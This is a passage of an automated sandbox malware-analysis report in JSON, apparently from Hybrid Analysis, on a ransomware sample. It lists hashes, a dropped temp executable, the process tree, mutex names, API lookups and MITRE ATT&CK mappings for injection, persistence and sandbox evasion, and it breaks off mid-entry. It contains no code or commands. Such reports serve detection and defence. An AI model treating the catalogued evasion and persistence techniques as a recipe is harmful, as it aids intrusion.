Hybrid Analysis - Ransomware
{"size": 606060, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f", "sha256": "3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 141, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 606064, "sha256": "0ce7202ddb10e4b65e5aeb50f6df646d518d4aceffa5fa10b104a54599ec3f58", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe (PID: 2920)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00002920", "name": "3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe", "normalized_path": "C:\\3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe", "sha256": "3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f", "av_label": "Trojan.Generic", "av_matched": 14, "av_total": 22}, {"uid": "00000000-00002900", "parentuid": "00000000-00002920", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe *", "sha256": "0ce7202ddb10e4b65e5aeb50f6df646d518d4aceffa5fa10b104a54599ec3f58"}, {"uid": "00000000-00002956", "parentuid": "00000000-00002900", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZXQZZG", "sha256": "0ce7202ddb10e4b65e5aeb50f6df646d518d4aceffa5fa10b104a54599ec3f58"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e326b@ADVAPI32.dll\"\n \"0e000f00703f326b@ADVAPI32.dll\"\n \"0e000f00cc3f326b@ADVAPI32.dll\"\n \"11001200b447326b@ADVAPI32.dll\"\n \"110012004848326b@ADVAPI32.dll\"\n \"120013008c48326b@ADVAPI32.dll\"\n \"12001300e448326b@ADVAPI32.dll\"\n \"14001500386e326b@ADVAPI32.dll\"\n \"14001500506e326b@ADVAPI32.dll\"\n \"14001500686e326b@ADVAPI32.dll\"\n \"17001800806e326b@ADVAPI32.dll\"\n \"0d000e00986e326b@ADVAPI32.dll\"\n \"11001200a86e326b@ADVAPI32.dll\"\n \"11001200bc6e326b@ADVAPI32.dll\"\n \"0d000e004466326b@WININET.dll\"\n \"0d000e00b466326b@WININET.dll\"\n \"10001100ec66326b@WININET.dll\"\n \"100011009067326b@WININET.dll\"\n \"10001100006f326b@WININET.dll\"\n \"10001100146f326b@WININET.dll\"\n \"14001500286f326b@WININET.dll\"\n \"14001500406f326b@WININET.dll\"\n \"12001300586f326b@WININET.dll\"\n \"120013006c6f326b@WININET.dll\"\n \"10001100d067326b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00002920)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" 